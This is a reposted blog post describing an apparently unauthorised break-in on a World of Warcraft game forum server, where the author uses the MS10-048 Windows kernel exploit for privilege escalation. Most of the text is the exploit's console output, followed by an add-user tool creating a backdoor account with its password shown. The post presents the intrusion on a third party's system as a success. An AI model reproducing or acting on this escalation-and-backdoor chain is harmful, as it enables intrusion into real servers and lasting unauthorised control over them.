MS10048 Is Still a Killer Weapon Against Windows 2003 x86
Published: 2019-06-24


Today I went after a WoW game forum. The server environment was Win03 x86 + IIS 6.0 + PHP + MySQL.

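Privilege escalation was frustrating in every way: MySQL had no privileges, and there was no root. I tried several other methods and none of them worked. When I was really out of options, I gave MS10048 a try, and it succeeded.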

Dojibiron by Ronald Huizer, (c) master#h4cker.us
[ ] Trying to allocate a page at NULL.
    [+] Allocated page at 0x0000000000000000 for 0x0000000000000001
[ ] Bootstrapping kernel resolver.
    Module ntoskrnl.exe at 0x0000000000BD0000
    Base of driver: 0xFFFFF80001000000
    [+] Success.
[ ] Resolving PsReferencePrimaryToken
    [+] Success: 0xFFFFF8000129FE50
[ ] Resolving PsInitialSystemProcess
    [+] Success: 0xFFFFF800011D1FB0
[ ] Resolving PsLookupProcessByProcessId
    [+] Success: 0xFFFFF80001288BC0
[ ] Resolving PsDereferencePrimaryToken
    [+] Success: 0xFFFFF80001311B40
[+] Handle table retrieval succeeded.
    Userspace handle table: 0x00000000006B0000
    Kernelspace handle table: 0xFFFFF97FF7990000
    Handle table entries: 1024
[ ] Allocating fake HEAD page.
    [+] Allocated page at 0x0000000004000000 for 0x00000000040001FF
[ ] Setting up CBT filter hook.
    [+] Success.
[ ] Creating evil window
    [+] Success.
[ ] Destroyed handle at: 0xFFFFF97FF7990FC0
    pHead:	0xFFFFF97FF906BA00
    pOwner:	0xFFFFFA80000E8D80
    bType:	0x01 - TYPE_WINDOW
    bFlags:	0x00 -
    wUniq:	0x0004
[ ] Trigger handle at: 0xFFFFF97FF7995AC0
    pHead:	0xFFFFF97FF90900A0
    pOwner:	0xFFFFFA80000E8D80
    bType:	0x01 - TYPE_WINDOW
    bFlags:	0x00 -
    wUniq:	0x0003
[ ] Writing pool addr to: 0xFFFFF97FF7990F7F
	~ MS10_048 X64 EXP        ~
	Need a girl to love   QQ 65665651 email master#h4cker.us
[ ] Checking the success flag.
    [+] Set to 2 exploit half succeeded
[ ] Destroying trigger window
    pHead:	0x00000000000003CA
    pOwner:	0x0000000000000000
    bType:	0x00 - TYPE_FREE
    bFlags:	0x00 -
    wUniq:	0x0004
[ ] Spawning half a shell...
    Command: D:\RECYCLER\add.exe
[+] Enjoy!
          ==========================================
              Api Add User Made By Cond0r
                    2011.3.20
              Adduser.exe UserName PassWord Group
          ==========================================
	 User List:
	-->  7ksf
	-->  ASPNET
	-->  Guestasdfa
	-->  IUSR_NJXW-12-5-2
	-->  IWAM_NJXW-12-5-2
	-->  SUPPORT_388945a0
	Group List:
	 --> Administrators
	 --> Backup Operators
	 --> Distributed COM Users
	 --> Guests
	 --> Network Configuration Operators
	 --> Performance Log Users
	 --> Performance Monitor Users
	 --> Power Users
	 --> Print Operators
	 --> Remote Desktop Users
	 --> Replicator
	 --> Users
	 --> HelpServicesGroup
	 --> IIS_WPG
	 --> TelnetClients
  SuccessFul !!
User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !!

Using the API-based add-user tool, the account cond0r with the password 123!@#asdASD was added successfully.

Reposted from: https://www.cnblogs.com/hookjoy/p/3608694.html
